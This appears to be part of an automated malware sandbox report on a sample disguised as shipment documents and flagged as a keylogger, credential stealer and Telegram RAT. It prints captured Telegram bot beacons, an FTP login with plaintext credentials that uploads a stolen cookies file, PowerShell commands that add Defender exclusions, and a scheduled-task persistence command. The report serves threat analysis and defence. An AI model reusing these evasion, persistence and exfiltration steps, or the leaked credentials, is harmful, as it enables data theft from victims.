                                                    vary: Accept-Encoding
                                                    Cache-Control: max-age=86400
                                                    CF-Cache-Status: HIT
                                                    Age: 8
                                                    Last-Modified: Fri, 11 Oct 2024 07:35:19 GMT
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Xs875S9agr60f5ve1VDggC%2BCDRAK%2F2yERs93wxA0Bw89OAyvxwub25iAIGxtaUgC1iwaCa6AinhYT%2B2Xqo6vGrvxKNT64UpKRMl%2B4%2Bp%2BGVB6c%2BXf%2B%2FCwqlHc85h7Kvb13uMViS3j"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 8d0d2c6baa548c6f-EWR
                                                    alt-svc: h3=":443"; ma=86400
                                                    2024-10-11 07:35:27 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                                    Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                    2024-10-11 07:35:27 UTC5INData Raw: 30 0d 0a 0d 0a
                                                    Data Ascii: 0


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    13192.168.2.449761188.114.96.34437768C:\Users\user\Desktop\rShipmentDocuments.exe
                                                    TimestampBytes transferredDirectionData
                                                    2024-10-11 07:35:28 UTC84OUTGET /xml/8.46.123.33 HTTP/1.1
                                                    Host: reallyfreegeoip.org
                                                    Connection: Keep-Alive
                                                    2024-10-11 07:35:28 UTC712INHTTP/1.1 200 OK
                                                    Date: Fri, 11 Oct 2024 07:35:28 GMT
                                                    Content-Type: application/xml
                                                    Transfer-Encoding: chunked
                                                    Connection: close
                                                    access-control-allow-origin: *
                                                    vary: Accept-Encoding
                                                    Cache-Control: max-age=86400
                                                    CF-Cache-Status: HIT
                                                    Age: 9
                                                    Last-Modified: Fri, 11 Oct 2024 07:35:19 GMT
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Ov29A6nBB1qG8EvlPdLf%2Bvameea%2FDBhzDK2s9qtdT5KTsisrlgZBCbWF%2BA7%2Fj%2BWO7ZCKEcxQ%2BpwORvDja2pejQET3YGpo3mz5vMxan48vU1l5MactXNHBXyYw%2By5ocg3b%2F5rITNJ"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 8d0d2c716dbcc470-EWR
                                                    alt-svc: h3=":443"; ma=86400
                                                    2024-10-11 07:35:28 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                                    Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                    2024-10-11 07:35:28 UTC5INData Raw: 30 0d 0a 0d 0a
                                                    Data Ascii: 0


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    14192.168.2.449762188.114.96.34438136C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe
                                                    TimestampBytes transferredDirectionData
                                                    2024-10-11 07:35:28 UTC84OUTGET /xml/8.46.123.33 HTTP/1.1
                                                    Host: reallyfreegeoip.org
                                                    Connection: Keep-Alive
                                                    2024-10-11 07:35:28 UTC702INHTTP/1.1 200 OK
                                                    Date: Fri, 11 Oct 2024 07:35:28 GMT
                                                    Content-Type: application/xml
                                                    Transfer-Encoding: chunked
                                                    Connection: close
                                                    access-control-allow-origin: *
                                                    vary: Accept-Encoding
                                                    Cache-Control: max-age=86400
                                                    CF-Cache-Status: HIT
                                                    Age: 9
                                                    Last-Modified: Fri, 11 Oct 2024 07:35:19 GMT
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1s7caMhoiznEbiQE0BGBfzjcRAHgiWnQ1x7ExL3Upk8UrQ6Kt%2BPZfUors4blJZNiPASSKRTmh7eWS6nWSxInqsnPOlkIbvehyEHcmvS2HttKrUU7dxwTskGGQJIehghm%2FDRo%2FIOY"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 8d0d2c73dcd0430d-EWR
                                                    alt-svc: h3=":443"; ma=86400
                                                    2024-10-11 07:35:28 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                                    Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                    2024-10-11 07:35:28 UTC5INData Raw: 30 0d 0a 0d 0a
                                                    Data Ascii: 0


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    15192.168.2.449765188.114.96.34437768C:\Users\user\Desktop\rShipmentDocuments.exe
                                                    TimestampBytes transferredDirectionData
                                                    2024-10-11 07:35:29 UTC60OUTGET /xml/8.46.123.33 HTTP/1.1
                                                    Host: reallyfreegeoip.org
                                                    2024-10-11 07:35:29 UTC709INHTTP/1.1 200 OK
                                                    Date: Fri, 11 Oct 2024 07:35:29 GMT
                                                    Content-Type: application/xml
                                                    Transfer-Encoding: chunked
                                                    Connection: close
                                                    access-control-allow-origin: *
                                                    vary: Accept-Encoding
                                                    Cache-Control: max-age=86400
                                                    CF-Cache-Status: HIT
                                                    Age: 10
                                                    Last-Modified: Fri, 11 Oct 2024 07:35:19 GMT
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2Bhz2tgo34ckvT9jvaHr9jZyaBqtcg%2F3NG638sNoKymwLTvACNQikuBue%2BQmg8Vk39S2S6BZ5%2BMhEI4H4d2Z3d8xESsNuIOYUukT%2ByADP4aTj%2BdLR9ceOr1DYtl1CPuyjUusf8tlB"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 8d0d2c796a574309-EWR
                                                    alt-svc: h3=":443"; ma=86400
                                                    2024-10-11 07:35:29 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                                    Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                    2024-10-11 07:35:29 UTC5INData Raw: 30 0d 0a 0d 0a
                                                    Data Ascii: 0


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    16192.168.2.449766188.114.96.34438136C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe
                                                    TimestampBytes transferredDirectionData
                                                    2024-10-11 07:35:29 UTC60OUTGET /xml/8.46.123.33 HTTP/1.1
                                                    Host: reallyfreegeoip.org
                                                    2024-10-11 07:35:29 UTC699INHTTP/1.1 200 OK
                                                    Date: Fri, 11 Oct 2024 07:35:29 GMT
                                                    Content-Type: application/xml
                                                    Transfer-Encoding: chunked
                                                    Connection: close
                                                    access-control-allow-origin: *
                                                    vary: Accept-Encoding
                                                    Cache-Control: max-age=86400
                                                    CF-Cache-Status: HIT
                                                    Age: 10
                                                    Last-Modified: Fri, 11 Oct 2024 07:35:19 GMT
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=X9DHG9H0fFDRFG5zmqFwTKJrFqdpiCuOO50DsuZdq7BcabZr6hJNVlCwx3vJE9hWRuMsfwHBIZW6cR%2FOUYDNinbflDjN83ieYatNRCjVx9SnTBtIuIoL84xWnRv52J1bawg2EYnd"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 8d0d2c7c29dcc411-EWR
                                                    alt-svc: h3=":443"; ma=86400
                                                    2024-10-11 07:35:29 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                                    Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                    2024-10-11 07:35:29 UTC5INData Raw: 30 0d 0a 0d 0a
                                                    Data Ascii: 0


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    17192.168.2.449767149.154.167.2204437768C:\Users\user\Desktop\rShipmentDocuments.exe
                                                    TimestampBytes transferredDirectionData
                                                    2024-10-11 07:35:30 UTC349OUTGET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:301389%0D%0ADate%20and%20Time:%2011/10/2024%20/%2015:40:15%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20301389%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1
                                                    Host: api.telegram.org
                                                    Connection: Keep-Alive
                                                    2024-10-11 07:35:30 UTC344INHTTP/1.1 404 Not Found
                                                    Server: nginx/1.18.0
                                                    Date: Fri, 11 Oct 2024 07:35:30 GMT
                                                    Content-Type: application/json
                                                    Content-Length: 55
                                                    Connection: close
                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                    Access-Control-Allow-Origin: *
                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                    2024-10-11 07:35:30 UTC55INData Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 34 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 4e 6f 74 20 46 6f 75 6e 64 22 7d
                                                    Data Ascii: {"ok":false,"error_code":404,"description":"Not Found"}


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    18192.168.2.449770188.114.96.34438136C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe
                                                    TimestampBytes transferredDirectionData
                                                    2024-10-11 07:35:31 UTC84OUTGET /xml/8.46.123.33 HTTP/1.1
                                                    Host: reallyfreegeoip.org
                                                    Connection: Keep-Alive
                                                    2024-10-11 07:35:31 UTC701INHTTP/1.1 200 OK
                                                    Date: Fri, 11 Oct 2024 07:35:31 GMT
                                                    Content-Type: application/xml
                                                    Transfer-Encoding: chunked
                                                    Connection: close
                                                    access-control-allow-origin: *
                                                    vary: Accept-Encoding
                                                    Cache-Control: max-age=86400
                                                    CF-Cache-Status: HIT
                                                    Age: 12
                                                    Last-Modified: Fri, 11 Oct 2024 07:35:19 GMT
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=v2cDRZvhueeJXe7LATkMfDon8clK42uWFOZK%2BZkwGbrEk%2FExiuBt1uQ5KK3D03njoGYiD9EGqHHLZZG5MiPWlAj3RcRZ9MKmwC60vWYUmwpoKNcvDdlmb0iwuBofPFvAMUmTiJHk"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 8d0d2c85ab897cb2-EWR
                                                    alt-svc: h3=":443"; ma=86400
                                                    2024-10-11 07:35:31 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                                    Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                    2024-10-11 07:35:31 UTC5INData Raw: 30 0d 0a 0d 0a
                                                    Data Ascii: 0


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    19192.168.2.449773149.154.167.2204438136C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe
                                                    TimestampBytes transferredDirectionData
                                                    2024-10-11 07:35:32 UTC349OUTGET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:301389%0D%0ADate%20and%20Time:%2011/10/2024%20/%2015:30:22%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20301389%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1
                                                    Host: api.telegram.org
                                                    Connection: Keep-Alive
                                                    2024-10-11 07:35:32 UTC344INHTTP/1.1 404 Not Found
                                                    Server: nginx/1.18.0
                                                    Date: Fri, 11 Oct 2024 07:35:32 GMT
                                                    Content-Type: application/json
                                                    Content-Length: 55
                                                    Connection: close
                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                    Access-Control-Allow-Origin: *
                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                    2024-10-11 07:35:32 UTC55INData Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 34 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 4e 6f 74 20 46 6f 75 6e 64 22 7d
                                                    Data Ascii: {"ok":false,"error_code":404,"description":"Not Found"}


                                                    FTP Packets

                                                    TimestampSource PortDest PortSource IPDest IPCommands
                                                    Oct 11, 2024 09:35:38.569251060 CEST2149204185.230.141.85192.168.2.4220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------
                                                    220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 6 of 50 allowed.
                                                    220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 6 of 50 allowed.220-Local time is now 07:35. Server port: 21.
                                                    220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 6 of 50 allowed.220-Local time is now 07:35. Server port: 21.220-This is a private system - No anonymous login
                                                    220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 6 of 50 allowed.220-Local time is now 07:35. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server.
                                                    220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 6 of 50 allowed.220-Local time is now 07:35. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server.220 You will be disconnected after 15 minutes of inactivity.
                                                    Oct 11, 2024 09:35:38.569528103 CEST4920421192.168.2.4185.230.141.85USER Soma@hulonqgroup.com
                                                    Oct 11, 2024 09:35:38.792526960 CEST2149204185.230.141.85192.168.2.4331 User Soma@hulonqgroup.com OK. Password required
                                                    Oct 11, 2024 09:35:38.792690039 CEST4920421192.168.2.4185.230.141.85PASS TNwhAkO^1&lZ
                                                    Oct 11, 2024 09:35:39.098913908 CEST2149204185.230.141.85192.168.2.4230 OK. Current restricted directory is /
                                                    Oct 11, 2024 09:35:39.320677042 CEST2149204185.230.141.85192.168.2.4504 Unknown command
                                                    Oct 11, 2024 09:35:39.320897102 CEST4920421192.168.2.4185.230.141.85PWD
                                                    Oct 11, 2024 09:35:39.653044939 CEST2149204185.230.141.85192.168.2.4257 "/" is your current location
                                                    Oct 11, 2024 09:35:39.653198004 CEST4920421192.168.2.4185.230.141.85TYPE I
                                                    Oct 11, 2024 09:35:39.875978947 CEST2149204185.230.141.85192.168.2.4200 TYPE is now 8-bit binary
                                                    Oct 11, 2024 09:35:39.876336098 CEST4920421192.168.2.4185.230.141.85PASV
                                                    Oct 11, 2024 09:35:40.098352909 CEST2149204185.230.141.85192.168.2.4227 Entering Passive Mode (185,230,141,85,194,29)
                                                    Oct 11, 2024 09:35:40.103816032 CEST4920421192.168.2.4185.230.141.85STOR 301389 - Cookies ID - ZyiAEnXWZP1593367783.txt
                                                    Oct 11, 2024 09:35:40.712950945 CEST2149204185.230.141.85192.168.2.4150 Accepted data connection
                                                    Oct 11, 2024 09:35:40.935658932 CEST2149204185.230.141.85192.168.2.4226-File successfully transferred
                                                    226-File successfully transferred226 0.222 seconds (measured here), 29.88 Kbytes per second

                                                    Statistics

                                                    CPU Usage

                                                    Click to jump to process

                                                    Memory Usage

                                                    Click to jump to process

                                                    High Level Behavior Distribution

                                                    Click to dive into process behavior distribution

                                                    Behavior

                                                    Click to jump to process

                                                    System Behavior

                                                    General

                                                    Target ID:0
                                                    Start time:03:35:11
                                                    Start date:11/10/2024
                                                    Path:C:\Users\user\Desktop\rShipmentDocuments.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:"C:\Users\user\Desktop\rShipmentDocuments.exe"
                                                    Imagebase:0xeb0000
                                                    File size:731'136 bytes
                                                    MD5 hash:FF8C4AB4EC18F05864879323F4A41050
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1729453835.00000000043CD000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000000.00000002.1729453835.00000000043CD000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000000.00000002.1729453835.00000000043CD000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000000.00000002.1729453835.00000000043CD000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                    Reputation:low
                                                    Has exited:true

                                                    General

                                                    Target ID:2
                                                    Start time:03:35:13
                                                    Start date:11/10/2024
                                                    Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\rShipmentDocuments.exe"
                                                    Imagebase:0x760000
                                                    File size:433'152 bytes
                                                    MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high
                                                    Has exited:true

                                                    General

                                                    Target ID:3
                                                    Start time:03:35:13
                                                    Start date:11/10/2024
                                                    Path:C:\Windows\System32\conhost.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                    Imagebase:0x7ff7699e0000
                                                    File size:862'208 bytes
                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high
                                                    Has exited:true

                                                    General

                                                    Target ID:4
                                                    Start time:03:35:13
                                                    Start date:11/10/2024
                                                    Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe"
                                                    Imagebase:0x760000
                                                    File size:433'152 bytes
                                                    MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high
                                                    Has exited:true

                                                    General

                                                    Target ID:5
                                                    Start time:03:35:13
                                                    Start date:11/10/2024
                                                    Path:C:\Windows\System32\conhost.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                    Imagebase:0x7ff7699e0000
                                                    File size:862'208 bytes
                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high
                                                    Has exited:true

                                                    General

                                                    Target ID:6
                                                    Start time:03:35:13
                                                    Start date:11/10/2024
                                                    Path:C:\Windows\SysWOW64\schtasks.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ZOlmYtPdlO" /XML "C:\Users\user\AppData\Local\Temp\tmp44A0.tmp"
                                                    Imagebase:0x380000
                                                    File size:187'904 bytes
                                                    MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high
                                                    Has exited:true

                                                    General

                                                    Target ID:7
                                                    Start time:03:35:13
                                                    Start date:11/10/2024
                                                    Path:C:\Windows\System32\conhost.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                    Imagebase:0x7ff7699e0000
                                                    File size:862'208 bytes
                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high
                                                    Has exited:true

                                                    General

                                                    Target ID:8
                                                    Start time:03:35:14
                                                    Start date:11/10/2024
                                                    Path:C:\Users\user\Desktop\rShipmentDocuments.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:"C:\Users\user\Desktop\rShipmentDocuments.exe"
                                                    Imagebase:0x170000
                                                    File size:731'136 bytes
                                                    MD5 hash:FF8C4AB4EC18F05864879323F4A41050
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:low
                                                    Has exited:true

                                                    General

                                                    Target ID:9
                                                    Start time:03:35:14
                                                    Start date:11/10/2024
                                                    Path:C:\Users\user\Desktop\rShipmentDocuments.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:"C:\Users\user\Desktop\rShipmentDocuments.exe"
                                                    Imagebase:0x8b0000
                                                    File size:731'136 bytes
                                                    MD5 hash:FF8C4AB4EC18F05864879323F4A41050
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
